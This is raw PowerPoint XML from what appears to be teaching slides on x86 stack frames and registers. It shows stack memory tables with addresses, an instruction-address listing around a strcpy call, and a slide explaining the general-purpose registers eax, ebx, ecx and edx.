                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a: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208</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="43658" y="135968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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1928602785"/>
              </p:ext>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0xbffff69c</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0x0</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>80483fd</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771235" y="59464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28597358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782123131"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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209</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42892" y="173007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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81100244"/>
              </p:ext>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0xbffff698</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0x0</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>80483fe</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771235" y="87243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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2056323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28" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>x86 Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003529" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registers represent the local variables of the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are four 32-bit general purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cx, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accumulator: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer to data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop counter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I/O operations: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003531" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3028950"/>
            <a:ext cx="3810000" cy="4000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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003532" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3028950"/>
            <a:ext cx="990600" cy="4000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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003533" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3028950"/>
            <a:ext cx="914400" cy="4000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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003534" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477001" y="2272784"/>
            <a:ext cx="505267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003535" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="3644384"/>
            <a:ext cx="402674" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003536" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7600950" y="2955131"/>
            <a:ext cx="114300" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
